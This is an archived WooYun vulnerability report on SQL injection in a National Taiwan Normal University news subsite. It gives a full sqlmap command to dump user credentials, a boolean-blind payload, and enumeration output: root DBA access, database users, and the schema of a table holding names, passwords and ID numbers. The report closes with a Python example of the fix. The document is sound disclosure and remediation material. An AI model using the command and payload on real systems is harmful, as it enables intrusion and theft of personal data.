WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
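2015-10-24: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in related fields
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to trainee white hats
2015-12-10: Details disclosed to the public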
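SQL injection in a subsite of National Taiwan Normal University (DBA privileges / root password disclosure / 102 tables / disclosure of many users' names, passwords, e-mail addresses and other data)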
Test URL: http://**.**.**.**/news/index.php?mode=data&id=15434
python sqlmap.py -u "http://**.**.**.**/news/index.php?mode=data&id=15434" -p id --technique=B --threads=10 -D ntnu_relations -T imw_users -C id,name,username,password,email --dump --threads=10
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mode=data&id=15434 AND 2269=2269
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL 5
current user:    'root@localhost'
current user is DBA:    True
database management system users [14]:
[*] ''@'%.%.%.%'
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'cherry'@'**.**.**.**'
[*] 'new_account_name'@'IP'
[*] 'ntnu_relations'@'%'
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'server'@'%'

available databases [4]:
[*] information_schema
[*] mysql
[*] ntnu_relations
[*] test

Database: ntnu_relations
[102 tables]

Database: ntnu_relations
Table: imw_users
[12 columns]
+------------------+-------------------+
| Column           | Type              |
+------------------+-------------------+
| company_name     | varchar(255)      |
| email            | varchar(255)      |
| id               | int(10)           |
| idnumber         | varchar(20)       |
| name             | varchar(255)      |
| name_alias       | varchar(255)      |
| password         | varchar(100)      |
| person_in_charge | varchar(255)      |
| portrait         | varchar(255)      |
| sex              | eaum('0',!??????? |
| type_id          | int(10)           |
| username         | varchar(100)      |
+------------------+-------------------+

Database: ntnu_relations
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| imw_users | 890     |
+-----------+---------+
The first 20 rows are enough to demonstrate the impact:
Database: ntnu_relations
Table: imw_users
[20 entries]
Add filtering.
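What that filtering has to achieve for the `id` parameter, as an added example that is not part of the original report or the site's code. It is modelled in Python with an in-memory SQLite table instead of the site's PHP/MySQL, and the `news` table, the function names and the false condition `2269=2270` are constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the table behind index.php?mode=data&id=...
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (15434, 'constructed sample article')")
    return db


def fetch_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so "AND 2269=2269"
    # becomes part of the WHERE clause and the page content turns into a
    # true/false signal.
    return db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()


def parse_id(raw_id):
    # Filtering step: accept 1 to 10 ASCII digits and nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)


def fetch_hardened(db, raw_id):
    # Validation plus a bound parameter: the value is never parsed as SQL.
    return db.execute(
        "SELECT title FROM news WHERE id = ?", (parse_id(raw_id),)
    ).fetchall()


def demo():
    db = make_db()
    true_rows = fetch_vulnerable(db, "15434 AND 2269=2269")   # payload from the report
    false_rows = fetch_vulnerable(db, "15434 AND 2269=2270")  # constructed false case
    try:
        fetch_hardened(db, "15434 AND 2269=2269")
        rejected = False
    except ValueError:
        rejected = True
    return len(true_rows), len(false_rows), rejected, fetch_hardened(db, "15434")


if __name__ == "__main__":
    print(demo())
```

The sqlmap output above also reports the application's database session as root with DBA rights; a dedicated low-privilege account for the news application limits what any remaining injection can read.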
Severity: High
Vulnerability Rank: 19
Confirmed: 2015-10-26 23:27
Thank you for the report.
None yet